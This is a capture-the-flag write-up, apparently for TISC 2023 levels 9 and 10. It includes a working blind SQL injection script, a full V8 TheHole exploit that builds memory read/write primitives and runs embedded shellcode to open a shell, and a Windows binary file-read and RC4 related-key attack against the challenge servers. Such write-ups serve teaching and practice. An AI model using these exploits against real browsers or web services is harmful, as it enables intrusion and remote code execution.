7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
from requests import *

def fatal(info=None):
    if info != None:
        print(info)
    print("ERROR!!")
    quit()

password = r"TISC{"

def oracle(text):
    if "Uh oh. Something went wrong." in text:
        return -1
    elif "Welcome" in text:
        return 1
    elif "Invalid username/password" in text:
        return 0
    else:
        fatal(text)

import string
alphabet = r"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_{}"
for char in string.printable:
    if not char in alphabet:
        alphabet += char
print(f"Using {alphabet=}")

def try_password(password):
    condition = f"SUBSTRING(BINARY password,{len(password)},1)='{password[-1]}'"
    exp = f"admin%22 AND {condition} #"
    exp += "A" * (0x45 - len(exp))

    res = -1
    count = 0
    while res == -1:  # something went wrong
        if count > 4:
            fatal(f"SOMETHING WENT WRONG!: {password}")

        count += 1
        r = post("http://chals.tisc23.ctf.sg:28471/api/login", data={
            "username": exp + "\x42\x02\x00\x00\x00\x00\x00",
            "password": "A" * 0x43 + "'"
        })
        # print(r.text)
        res = oracle(r.text)

    return res == 1  # correct password

def blind():
    global password
    while True:
        if password[-1] == "}":
            print(f"Recovered password: {password}")
            break

        for letter in alphabet:
            curr_password = password + letter
            if try_password(curr_password):
                password = curr_password
                print(f"Password: {password}")
                break
        else:
            fatal(f"Blind sql failed at {password}")

blind()

Flag: TISC{a1PhAb3t_0N1Y}

I solved this challenge largely based on intuition from doing pwn challenges. I’d love to spend more time figuring out why this works.

Level 9

PalinChrome (RE, Pwn, Browser Exploitation)

To ensure a safe browsing environment, PALINDROME came up with their own browser, powered by their own proprietary Javascript engine. What could go wrong? Note: The flag is in the same directory as ‘d8’ and with the filename ‘flag’. nc chals.tisc23.ctf.sg 61521 Attached files: snapshot_blob.bin build.Dockerfile d9.patch d8

This is a pretty standard browser pwn challenge involving v8. Looking at the patchfile, we see the following change:

1
2
3
4
5
6
7
8
9
10
11
12
13
diff --git a/src/builtins/builtins-object.cc b/src/builtins/builtins-object.cc
index e6d26ef7c7..279a6b7c4d 100644
--- a/src/builtins/builtins-object.cc
+++ b/src/builtins/builtins-object.cc
@@ -367,5 +367,10 @@ BUILTIN(ObjectSeal) {
   return *object;
 }
 
+BUILTIN(ObjectLeakHole){
+  HandleScope scope(isolate);
+  return ReadOnlyRoots(isolate).the_hole_value();
+}
+

In essence, the patch introduces a method Object.leakHole() that leaks the value of the TheHole. It is well-documented how leaking this value can lead to exploitation and RCE. This post by STAR Labs covers CVE-2021-38003, where we can leak TheHole via triggering and catching an exception. TheHole is then used as a key for a map to cause its size to become -1:

1
2
3
4
5
6
7
8
let hole = trigger(); // Get the hole value

var map = new Map();
map.set(1, 1);
map.set(hole, 1);
map.delete(hole);
map.delete(hole);
map.delete(1);

Another way of leaking the hole was found in CVE-2022-1364. Google then added a patch to prevent TheHole from being exploited in this manner anymore, pre-empting any further exploits that could leak TheHole. In 2023, a new vulnerabilitiy CVE-2023-2033 was found that leaked TheHole. This blog post by CW Research documents the novel exploit method and even has a fully fleshed out POC.

We can use their POC and plug in our leak from Object.leakHole(). All that’s left is to modify the offset of our shellcode (which differs between environments). Trying a few values gives us 116 as a working offset, popping our shell.

Expoit:

Hide/show code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
const foo = () => {
    return [1.0,
      1.95538254221075331056310651818E-246,
      1.95606125582421466942709801013E-246,
      1.99957147195425773436923756715E-246,
      1.95337673326740932133292175341E-246,
      2.63486047652296056448306022844E-284];
  };
  
  for (let i = 0; i < 0x40000; i++) foo();

const FIXED_ARRAY_HEADER_SIZE = 8n;

var arr_buf = new ArrayBuffer(8);
var f64_arr = new Float64Array(arr_buf);
var b64_arr = new BigInt64Array(arr_buf);

function ftoi(f) {
  f64_arr[0] = f;
  return b64_arr[0];
}

function itof(i) {
  b64_arr[0] = i;
  return f64_arr[0];
}

function smi(i) {
  return i << 1n;
}

function gc_minor() {
  for (let i = 0; i < 1000; i++) {
    new ArrayBuffer(0x10000);
  }
}

function gc_major() {
  new ArrayBuffer(0x7fe00000);
}

function hex(i) {
  console.log("0x" + i.toString(16));
}


const the = { hole: Object.leakHole() };


var large_arr = new Array(0x10000);
large_arr.fill(itof(0xdeadbee0n));

var fake_arr = null;
var fake_arr_addr = null;
var fake_arr_elements_addr = null;

var packed_dbl_map = null;
var packed_dbl_props = null;

var packed_map = null;
var packed_props = null;

function leak_stuff(b) {
  if (b) {
    let index = Number(b ? the.hole : -1);
    index |= 0;
    index += 1;

    let arr1 = [1.1, 2.2, 3.3, 4.4];
    let arr2 = [0x1337, large_arr];

    let packed_double_map_and_props = arr1.at(index * 4);
    let packed_double_elements_and_len = arr1.at(index * 5);

    let packed_map_and_props = arr1.at(index * 8);
    let packed_elements_and_len = arr1.at(index * 9);

    let fixed_arr_map = arr1.at(index * 6);

    let large_arr_addr = arr1.at(index * 7);

    return [
      packed_double_map_and_props,
      packed_double_elements_and_len,
      packed_map_and_props,
      packed_elements_and_len,
      fixed_arr_map,
      large_arr_addr,
      arr1,
      arr2,
    ];
  }
  return 0;
}

let res = leak_stuff(true);
for (let r of res) {
  console.log(hex(ftoi(r)));
}

function weak_fake_obj(b, addr = 1.1) {
  if (b) {
    let index = Number(b ? the.hole : -1);
    index |= 0;
    index += 1;

    let arr1 = [0x1337, {}];
    let arr2 = [addr, 2.2, 3.3, 4.4];

    let fake_obj = arr1.at(index * 8);

    return [fake_obj, arr1, arr2];
  }
  return 0;
}

function addrof(obj) {
  large_arr[0] = itof(packed_dbl_map | (packed_dbl_props << 32n));
  large_arr[1] = itof(fake_arr_elements_addr | (smi(1n) << 32n));

  fake_arr[0] = obj;
  let result = ftoi(large_arr[3]) & 0xffffffffn;

  large_arr[1] = itof(0n | (smi(0n) << 32n));

  return result;
}

function aar(addr) {
  addr -= FIXED_ARRAY_HEADER_SIZE;

  large_arr[0] = itof(packed_dbl_map | (packed_dbl_props << 32n));
  large_arr[1] = itof(addr | 1n | (smi(1n) << 32n));

  let result = ftoi(fake_arr[0]);

  large_arr[1] = itof(0n | (smi(0n) << 32n));

  return result;
}

function aaw(addr, value) {
  addr -= FIXED_ARRAY_HEADER_SIZE;

  large_arr[0] = itof(packed_dbl_map | (packed_dbl_props << 32n));
  large_arr[1] = itof(addr | 1n | (smi(1n) << 32n));

  fake_arr[0] = itof(value);

  large_arr[1] = itof(0n | (smi(0n) << 32n));
}

function install_primitives() {
  for (let i = 0; i < 2000; i++) {
    weak_fake_obj(false, 1.1);
  }
  for (let i = 0; i < 2000; i++) {
    weak_fake_obj(true, 1.1);
  }

  for (let i = 0; i < 11000; i++) {
    leak_stuff(false);
  }
  for (i = 0; i < 11000; i++) {
    leak_stuff(true);
  }

  gc_minor();

  let leaks = leak_stuff(true);

  let packed_double_map_and_props = ftoi(leaks[0]);
  packed_dbl_map = packed_double_map_and_props & 0xffffffffn;
  packed_dbl_props = packed_double_map_and_props >> 32n;

  let packed_double_elements_and_len = ftoi(leaks[1]);
  let packed_dbl_elements = packed_double_elements_and_len & 0xffffffffn;

  let packed_map_and_props = ftoi(leaks[2]);
  packed_map = packed_map_and_props & 0xffffffffn;
  packed_props = packed_map_and_props >> 32n;

  let packed_elements_and_len = ftoi(leaks[3]);
  let packed_elements = packed_elements_and_len & 0xffffffffn;

  let fixed_arr_map = ftoi(leaks[4]) & 0xffffffffn;
  let large_arr_addr = ftoi(leaks[5]) >> 32n;

  let dbl_arr = leaks[6];
  dbl_arr[0] = itof(packed_dbl_map | (packed_dbl_props << 32n));
  dbl_arr[1] = itof(
    (large_arr_addr + 8n - FIXED_ARRAY_HEADER_SIZE) | (smi(1n) << 32n)
  );

  let temp_fake_arr_addr = (packed_dbl_elements + FIXED_ARRAY_HEADER_SIZE) | 1n;

  let temp_fake_arr = weak_fake_obj(true, itof(temp_fake_arr_addr));
  let large_arr_elements_addr = ftoi(temp_fake_arr[0]) & 0xffffffffn;
  fake_arr_addr = large_arr_elements_addr + FIXED_ARRAY_HEADER_SIZE;
  fake_arr_elements_addr = fake_arr_addr + 16n;

  large_arr[0] = itof(packed_dbl_map | (packed_dbl_props << 32n));
  large_arr[1] = itof(fake_arr_elements_addr | (smi(0n) << 32n));
  large_arr[2] = itof(fixed_arr_map | (smi(0n) << 32n));

  fake_arr = weak_fake_obj(true, itof(fake_arr_addr))[0];

  temp_fake_arr = null;
}

do {
  install_primitives();
} while (!packed_dbl_map);

let code = (aar(addrof(foo) + 0x18n) - 1n) & 0xffffffffn;
console.log(hex(addrof(foo)))
console.log(hex(code))

let entry = (aar(code + 0x10n));
console.log(hex(entry))

aaw(code + 0x10n, entry + 116n);  // we changed this offset from 124 to 116

foo();

Loader:

1
2
3
4
5
6
7
import base64
with open("exp2.js", "r") as f:
    contents = f.read(-1)
    encoded = base64.b64encode(bytes(contents, "ascii"))
    sla(b"Base64 encoded javascript file to be passed to d8:", encoded)

p.interactive()

Flag: TISC{!F0unD_4_M1ll10n_d0LL4R_CHR0m3_3xP017}

Level 10

dogeGPT (Web, RE, Pwn, Crypto)

http://13.251.171.1 http://52.220.166.183/ Note: The above two servers are identical in case of capacity issues.

We register with a username on the site, giving us an option to “Start dogeGPT”. Clicking it launches a dogeGPT instance remotely, giving us a port to connect to it. Viewing the page source also reveals the following:

1
2
3
4
5
 <!-- 
    lol i forgot to delete a comment 
    <a href="/files.php">Download dogeGPT here!</a><br><br>
    <a href="/decrypt-flag.php">Shutdown dogeGPT and retrieve flag here :(</a>
 -->

We can download a copy of the dogeGPT.exe binary from the /files.php endpoint. However, the /decrypt-flag.php endpoint is still unauthorized for now. Similar to level 6, this challenge involves a lot of reversing (and painful WinDbg-ing).

dogeGPT.exe is a Windows executable written in C++. It runs with 4 command line arguments, which we’ll call argv1, argv2, argv3, argv4 for now. It starts up a socket server from a given port and accepts a connection from a given IP. It turns out that argv2 and argv4 are the IP and port it uses respectively. Next, the executable calls a produce_output() function, passing our input across the socket as an argument. There are a bunch of commands: help, start chat, end chat, get dogekey. If our input doesn’t match of these commands, it gets sent to a function we’ll call produce_doge(), which produces a doge ASCII art with our input and some random words.

I’ll give a quick overview of each of the commands.

  • help opens up a help file ‘help.txt’ and prints its contents to the screen
  • end chat ends the chat, starting a timer which terminates the session in 3 seconds
  • get dogekey calls a function that checks a win condition, before printing something to the screen

I also noted that when the program started up, it seems to ‘setup’ some files. These files were then ‘cleaned up’ or deleted when the program exited. My exact understanding of these behaviours were quite sketchy at this point of the reversing. I decided to explore a few interactions I thought might be interesting in order to better understand the program. One of these interactions was what would happen if you ended the chat, then tried to use the help command. In my mind, some UB might occur as ending the chat would ‘clean up’ the ‘help.txt’ file, which help would erroneously still try to access.

This led me to discovering the first vulnerability.

Arbitrary file read

Let’s first examine the code called for help. Here’s a rough decompilation from Ghidra with some of my added names:

1
2
3
4
5
6
7
8
9
10
11
  if ((plVar11 == (longlong *)&IMAGE_DOS_HEADER_00000000.e_cp) &&
     (iVar8 = memcmp(input_str_,"help",4), iVar8 == 0)) {
    if ((longlong)input_str__ - (longlong)s_filename >> 5 == 0) {
      throw_invalid_vector_subscript();
      pcVar2 = (code *)swi(3);
      (*pcVar2)();
      return;
    }
    input_str__ = copy_string((undefined (*) [16])local_78,(undefined8 *)s_filename);
    ppvVar9 = (void **)read_file????((undefined (*) [16])&local_58,(void **)input_str__);
    ppvVar9 = add_to_string?(ppvVar9,&DAT_0000b8c8,1);

First, our input gets compared with “help”. If it matches, we go into this branch, which first does some boilerplate vector checks. Then, we copy the filename into input_str__, which is used as the parameter for a read_file() call. This call is at offset 0x5028, so let’s try breaking there in WinDbg (we pass 127.0.0.1 as argv2 and 3001 (or any other port) as argv4).

1
2
3
4
5
6
7
8
9
0:000> bu ohnoes+0x5028
0:000> g
ModLoad: 00007ff9`93010000 00007ff9`9307a000   C:\WINDOWS\system32\mswsock.dll
Breakpoint 0 hit
ohnoes+0x5028:
00007ff6`46865028 e883d2ffff      call    ohnoes+0x22b0 (00007ff6`468622b0)
0:000> dpa rdx
000000ba`3e8fef20  00000228`c602bd10 "c:\dogeGPT\help.txt"
[...]

We see that the second argument to the function (register rdx under Windows calling conventions) is a string containing the file name we read.

Now, let’s see what file we are reading after we end chat.

1
2
3
4
5
Breakpoint 0 hit
ohnoes+0x5028:
00007ff6`46865028 e883d2ffff      call    ohnoes+0x22b0 (00007ff6`468622b0)
0:000> da rdx
00000008`869deb10  "help"

Looks like we are trying to read a file called ‘help’. (Note that the two strings have a different structure – longer strings store a pointer to the string while shorter strings are stored directly at their memory location) This is interesting behaviour; it seems like due to memory corruption, read_file() will read whatever we input into the program after ending the chat, in this case, the string help. At the time, I guessed that this was due to a bug with uninitialized memory.

We want to use this to read arbitrary files, but it appears as though we can only use the string help as an input because only only that input will trigger this branch to run in the first place. However, with my intuition that this might be related to uninitialized memory, I thought about ‘initializing’ the memory with an initial value, e.g. ‘AAAAAAAA’, then subsequently sending the help command. The help command would trigger the branch to run, but the string would contain helpAAAA. In fact, this intuition proved correct. So, we can read arbitrary files, but the filename must begin with help.

This is not an issue as from the decompilation, we know that read_files() uses fstream to interact with the filesystem. fstream::open() supports relative paths and directory traversal via ../. This means that the passing the filename help/../file.txt to fstream::open() would cause it to open file.txt instead. We can use this behaviour to read arbitrary files on the system.

New findings

At this point, it would make sense to use our arbitrary file read to leak the PHP source code. Here’s a summary of the important findings:

  • In index.php, we see the authentication protocol. Our username is MD5 encoded, and the first 16 characters are appended to our plaintext username with “\x80” as a separator, and then base64 encoded. This is set as our cookie. For example, if our username were “Bob”, its MD5 hash would be 2fc1c0beb992cd7096975cfebf9d5c3b, and so our cookie would be b64e(Bob\x802fc1c0beb992cd70) == Qm9igDJmYzFjMGJlYjk5MmNkNzA5Njk3NWNmZWJmOWQ1YzNi.
1
2
3
4
5
6
7
8
9
10
[...]
$str = $_POST['uname'];
if (!preg_match("/[\p{N}\p{Z}\p{L}\p{M}]*/u",$str) || $str == "") {
	echo("Bad username!!<br>");
	die();
}
$h = substr(md5($str),0,16);
$uid = base64_encode($str . "\x80" . $h);
setcookie("u", $uid, time()+60);
[...]
  • In start.php, we see that argv1 is the result of some encryption (we’ll get back to this later), and argv3 is the first half of the MD5 encoded username (extracted from the cookie), e.g. 2fc1c0beb992cd70.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$aa = explode("\x80", base64_decode($uid));
if (!preg_match("/^[\da-f]+$/u",$aa[1])) {
	header("Location: /");
	die();
}

$uid = substr($aa[1],0,16);
exec("reg query HKCU\dogeGPT\ -v pri_key", $a1);
$pri = explode("    ", $a1[2])[3];

exec("reg query HKCU\dogeGPT\ -v dogekey", $a2);
$f = explode("    ", $a2[2])[3];        

$ef = enc($pri, $uid, $f);

$ip = $_SERVER['REMOTE_ADDR'];
$pt = rand(20000, 47000);
proc_open("C:\\dogeGPT\\dogeGPT.exe " . $ef . " " . $ip . " " . $uid . " " . $pt, [0=>["pipe","r"]], $p);
  • enc is defined in encrypt.php. It is a custom RC4 function that uses the sum of its first two arguments as a key. Additionally, it uses a key size and SBOX size of 16 nibbles (8 bytes) instead of the conventional 256 bytes. This custom algorithm operates over nibbles instead of bytes too. In start.php, a primary key and our UID (the MD5 hash) are used as the first two arguments (they sum to create the key) which encrypts the third argument, the dogekey. The output of this encryption is passed as argv1 to dogeGPT.exe.
1
2
3
4
5
6
7
function enc($pri, $uid, $flag) 
{
	$ks = array();  // keystream
	for ($i = 0; $i < 16; $i++ ) {
		$ks[] = (hexdec($pri[$i]) + hexdec($uid[$i])) % 16;
	}
[...]
  • decrypt-flag.php takes an argument dogekey, using it to decrypt our flag.
1
2
3
4
5
6
7
8
$enc_flag = "cHAwNlJXZ3hYY0V1TmVyK3VacEN2NVdwNUhZRGh2ZFFUa1JQVlp2M1ByWT0=";
$key = $_POST['dogekey'];
for ($i = 0; $i < 0xffffff; $i++) {
		$key = hash('sha256', $key);
}
$cipher = "aes-256-cbc";

$flag = openssl_decrypt(base64_decode($enc_flag), $cipher, $key);

With a better understanding of the arguments passed to dogeGPT.exe, let’s revisit reversing the executable.

Win condition

Disclaimer: this didn’t actually turn out to be the win condition, I just thought so during reversing

From reversing the binary, we figure out the following: produce_doge(), the function that gets called to handle our input if it isn’t a special command, does two things.

  • Check if the MD5 hash of our input equals argv3. If yes, it sets the win flag to be true. In other words, since argv3 is the MD5 hash of our username, if we enter our username (e.g. “Bob”) as input to the executable, the win flag will be set.
  • Checks if a 2-byte variable matches the 7th and 8th byte of the argv3 hash (e.g. cd70 for the hash 2fc1c0beb992cd70). I called this variable setup_winfilename_check. If the bytes match, the “win file” is set-up. The setup function creates the “win file” C:\dogeGPT\keys\{argv2}-{argv3} and writes the value of argv1 (the output of the encryption) into it.

If both the win flag is true and the “win file” is set-up, calling get dogekey will print the output of the “win file”, the encryption output. The value of setup_winfilename_check changes every time a function I called run_parserpy is called. run_parserpy runs a Python script parser.py, and based on its output, adds a value to setup_winfilename_check. Thus, in order to control the value of setup_winfilename_check to pass the check, we need to understand the values run_parserpy returns in order to controllably add values to setup_winfilename_check. We can use the arbitrary file read to retrieve the parser.py from remote.

Here’s the source for parser.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import sys
import requests
import openai

text = ""
for i in range(len(sys.argv)):
	if i > 0: 
		text = text + sys.argv[i] + " "

response = openai.ChatComplete.create(model="doge-gpt-0.1", messages=text)
c = 0
if len(response) != 0:
	for i in range(requests.get_len() // len(text)):
		if requests.is_sus(i):
			c += i
	print(response[c % len(response)]+","+str(c))
else:
	print(",0")

From the code, we see a few strange functions getting called: requests.get_len(), requests.is_sus() and openai.ChatComplete.create() with a weird model. This hints to us that requests and openai are actually custom Python modules, so we go ahead and retrieve requests.py and openai.py from the same directory as well.

Anyway, it looks like some operations are being run, and the value of c is being returned for use by the program. From debugging, this is indeed the value that gets added to setup_winfilename_check. The source code for requests and openai aren’t particularly interesting, but a QR code designed as an ASCII art in one of the files reveals the following message /htdocs/welp-sus.pdf, giving us the final piece of the puzzle.

Crypto

Accessing “/welp-sus.pdf” on the site leads us to the paper “A New Practical Key Recovery Attack on the Stream Cipher RC4 under Related-Key Model”. Uh oh, sounds like real Crypto™ to me. The paper presents a method of recovering the key used in a RC4 cipher in a specific context.

In our attack, the attacker is allowed to query key differentials to the KSA Oracle, which will return the S-Box differences to the attacker. If KSA Oracle returns with a (near) collision, then the attacker is able to recover some information of this tweaked key pair according to the key collision properties. And since the attacker knows the key differentials he submitted to the Oracle, he thus can trace back to recover the key based on the key differentials and the leaked key information from the tweaked key pair.

Essentially, RC4 takes a key K to encrypt some plaintext. RC4 uses an S-Box as part of the encryption process, which eventually gives us the encrypted plaintext, formally known as the output of the keystream. This specific attack context involves being able to “query key differentials”, or in other words, provide another key ΔK which gets added to K, to create a key K' which gets used in the encryption. Then, based on the value of the S-Box, we can retrieve the value of K. Noticeably, this is analogous to the encryption scenario we are faced with. The primary key is unknown to us, but we can query key differentials in the form of our UID.

Next, the specific attack we are using is for full-length keys. For this method, our goal is two find a pair of key differentials that lead to the same S-Box state. Formally, this is a ‘collision’. The paper dictates a specific way that the pair of key differentials should differ in order to trigger the collision. Such a collision is an indication of a given relation between the key differential and the key. Based on this given relation, we can then recover the key. This is done 2 bytes by 2 bytes for a 256-byte key as covered in the paper. In our case, since the key is 16 nibbles long, we do the recovery 2 nibbles by 2 nibbles. Furthermore, while we are unable to leak the value of the S-Box directly, if two S-Boxes are identical, the keystream output will be identical too. We can use this as our oracle. Putting this all together, we can query key differential pairs via our UID. The keystream output (result of the encryption) is used as argv1, and eventually leaked when we pass both win conditions (as explained above). We keep querying key differentials until we find a colliding keystream output. Using the technique covered in the paper, we can then recover 2 nibbles of the primary key. Repeat this until we recover the entire primary key. (I skipped over many details in my explanation, so if you are keen to find out more, do read the original paper)

In the bigger picture, recovering the primary key will give us the exact key used to encrypt our plaintext, the dogekey. Since we also have the encrypted plaintext (the keystream output), we can then use the key to decrypt it and retrieve the dogekey. Inputting the dogekey to the decrypt-flag.php logic should return the flag.

Implementation

Now, we’ll put together everything we’ve discussed thus far.

  1. We want to query arbitrary key differentials to the RC4 algorithm. Once again, the relevant sections from start.php
1
2
3
4
5
6
7
$aa = explode("\x80", base64_decode($uid));
[...]
$uid = $aa[1];
[...]
$ef = enc($pri, $uid, $f);
[...]
popen("start /b C:\\dogeGPT\\dogeGPT.exe " . $ef . " " . $ip . " " . $uid . " " . $pt, 'r');

From the previous example, our cookie Bob\x802fc1c0beb992cd70 would be split as ["Bob", "2fc1c0beb992cd70"], with the second element being used as the key differential for the primary key. However, there is actually no check on our username, meaning that we can supply Bob\x80abcdefgh as a username. This would cause a split of ["Bob", "abcdefgh", "<some_hash>"], using abcdefgh as our key differential. By exploiting this, we can query arbitrary key differentials, which ends up getting sent to the RC4 encryption algorithm.

  1. We want to retrieve the keystream output of our queries Recall that the keystream output, ef from the snippet above, becomes argv1, and eventually gets written into our “win file”. In order to print its contents using get dogekey, we need to meet the 2 win conditions of:
    • Check if the MD5 hash of our input equals argv3. If yes, it sets the win flag to be true
    • Checks if setup_winfilename_check matches the 7th and 8th byte of the argv3 hash. If yes, the win file is created with argv1 as its contents.

argv3 is an arbitrary hash we supply as a key differential, so in order to send the MD5 plaintext corresponding to it to pass condition 1, we would need to reverse an arbitrary MD5 hash. This is too computationally intensive to use for brute-forcing the primary key. However, we don’t actually need to pass condition 1. Instead, as long as we pass condition 2 and the win file is created, we can use our arbitrary file read to get its contents. So, we need only focus on how to pass condition 2.

setup_winfilename_check gets initialized with the value of 0xd06e, and gets added to by subsequent calls to parser.py. parser.py essentially takes our input and deterministically spits our a number. So, for instance, if our argv3 hash ends with 0x3456, and we want setup_winfilename_check to be equal to that, we need to send inputs such that parser.py returns -0x9c18 (or 0x10000 + -0x9c18 or 0x20000 + -0x9c18 etc since only 2 bytes are compared). With this in mind, we can precompute a ‘lookup table’ of sorts, where we have the set of inputs that correspond to each offset from 0x0 to 0x10000. Then, in order to add the desired value to setup_winfilename_check, we just need to send the set of inputs.

Empirically, we find that the output of parser.py depends solely on the input length, with the caveat that invalid characters cause it to return 0. As such, we can start crafting our lookup table.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import requests
import openai

lookup = {}
for i in range(3, 0x2a):
	text = "A"*i
	response = openai.ChatComplete.create(model="doge-gpt-0.1", messages=text)
	c = 0
	if len(response) != 0:
		for i in range(requests.get_len() // len(text)):
			if requests.is_sus(i):
				c += i
	c %= 0x10000
	lookup[c] = [text]

print(lookup)
"""
{18483: ['AAA'], 11365: ['AAAA'], 7244: ['AAAAA'], 5411: ['AAAAAA'], 4120: ['AAAAAAA'], 2889: ['AAAAAAAA'], 2195: ['AAAAAAAAA'], 1668: ['AAAAAAAAAA'], 1347: ['AAAAAAAAAAA'], 1130: ['AAAAAAAAAAAA'], 998: ['AAAAAAAAAAAAA'], 815: ['AAAAAAAAAAAAAA'], 700: ['AAAAAAAAAAAAAAAA'], 649: ['AAAAAAAAAAAAAAAAA'], 555: ['AAAAAAAAAAAAAAAAAA'], 466: ['AAAAAAAAAAAAAAAAAAA'], 423: ['AAAAAAAAAAAAAAAAAAAA'], 383: ['AAAAAAAAAAAAAAAAAAAAA'], 345: ['AAAAAAAAAAAAAAAAAAAAAA'], 308: ['AAAAAAAAAAAAAAAAAAAAAAA'], 273: ['AAAAAAAAAAAAAAAAAAAAAAAAAAAA'], 244: ['AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'], 216: ['AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'], 189: ['AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'], 163: ['AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'], 138: ['AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'], 114: ['AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'], 91: ['AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'], 69: ['AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA']}
"""

This becomes a programming challenge to fill the lookup table. First, I iterated over the key-value pairs in a double loop, combining them to create new key-value pairs (cartesian product). I did this twice. This yielded roughly ~0x5000 offsets. Next, I did a naive lookup of the missing offsets. Doing this twice filled the lookup table completely.

Hide/show code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
import requests
import openai
import random

def sort_dict(d):
	myKeys = list(d.keys())
	myKeys.sort()
	sorted_dict = {i: d[i] for i in myKeys}
	return sorted_dict

def get_dict_len(d):
	return len(list(d.keys()))

def easy_gen(n):
	lookup = {}

	for i in range(3, 0x2a):
		text = "A"*i

		response = openai.ChatComplete.create(model="doge-gpt-0.1", messages=text)
		c = 0
		if len(response) != 0:
			for i in range(requests.get_len() // len(text)):
				if requests.is_sus(i):
					c += i

		c %= 0x10000
		lookup[c] = [text]
		
	for _ in range(n):
		lookup_keys = list(lookup.keys()).copy()
		for i in lookup_keys:
			for j in lookup_keys:
				# print(i, j)
				k = (i + j) % 0x10000

				if k not in lookup_keys:
					lookup[k] = lookup[i] + lookup[j]
	return lookup

def find(n, lookup, limit = 10):
	n = (n - 0xd06e) % 0x10000
	ans = []
	for _ in range(limit):
		if n in lookup.keys():
			ans += lookup[n]
			break
		else:
			i = random.randint(0, len(list(lookup.keys())) - 1)
			i = list(lookup.keys())[i]
			ans += lookup[i]
			n = (n - i) % 0x10000
	else:
		return None
	
	return ans

def verify(target, steps):
	target %= 0x10000
	start = 0xd06e
	for step in steps:
		text = step

		response = openai.ChatComplete.create(model="doge-gpt-0.1", messages=text)
		c = 0
		if len(response) != 0:
			for i in range(requests.get_len() // len(text)):
				if requests.is_sus(i):
					c += i
		c %= 0x10000

		start = (start + c) % 0x10000

	return target == start

import pickle
def save(lookup, filename):
	dump = pickle.dumps(lookup)
	with open(filename, "wb") as f:
		f.write(dump)

def load(filename):
	with open(filename, "rb") as f:
		dump = f.read(-1)
		return pickle.loads(dump)
	
def random_boost(lookup, verbose = True, limit = 10):
	num_fails = 0
	fails = []
	lookup2 = {}
	for i in range(0x10000):
		if verbose and i % 0x1000 == 0:
			print(hex(i))

		j = (i - 0xd06e) % 0x10000
		if j in lookup.keys():
			continue

		pls = find(i, lookup, limit)
		if pls is None:
			num_fails += 1
			fails.append(i)
		else:
			lookup2[j] = pls

	return {
		"num_fails": num_fails,
		"fails": fails,
		"new_lookup": lookup2
	}

def verify_integrity(lookup, rounds = 10):
	for _ in range(rounds):
		i = random.randint(0, len(list(lookup.keys())) - 1)
		i = list(lookup.keys())[i]
		if not verify((0xd06e + i) % 0x10000, lookup[i]):
			print(f"Failed integrity at round {_}: {i}")
			return
	print(f"Integrity successful with rounds: {rounds}")


lookup = easy_gen(2)
print(hex(get_dict_len(lookup)))
res = random_boost(lookup)
lookup.update(res["new_lookup"])
print(hex(get_dict_len(lookup)))
save(lookup, "out.data")

lookup = load("out.data")
verify_integrity(lookup, rounds = 0x100)
print(hex(get_dict_len(lookup)))
res = random_boost(lookup, verbose=False)
lookup.update(res["new_lookup"])
print(hex(get_dict_len(lookup)))
lookup = save(lookup, "full.data")

Finally, we piece everything together programmatically together with the key retrieval technique from the paper, yielding the primary key of c390c2bac4a3c690. We can use this to decrypt one of the keystream outputs we have saved to obtain the decrypted dogekey: 600d715cf1a6baadd06e10000d011a55.

Putting this into decrypt-flag.php yields the final flag:

1
2
3
4
5
6
7
8
9
10
<?php
	$enc_flag = "cHAwNlJXZ3hYY0V1TmVyK3VacEN2NVdwNUhZRGh2ZFFUa1JQVlp2M1ByWT0=";
	$key = "600d715cf1a6baadd06e10000d011a55";
	for ($i = 0; $i < 0xffffff; $i++) {
		$key = hash('sha256', $key);
	}
	$cipher = "aes-256-cbc";
	$flag = openssl_decrypt(base64_decode($enc_flag), $cipher, $key);
	echo $flag;
?>

Flag: TISC{5UCH_@I_V3RY_IF_3153_W0W}

Addendums

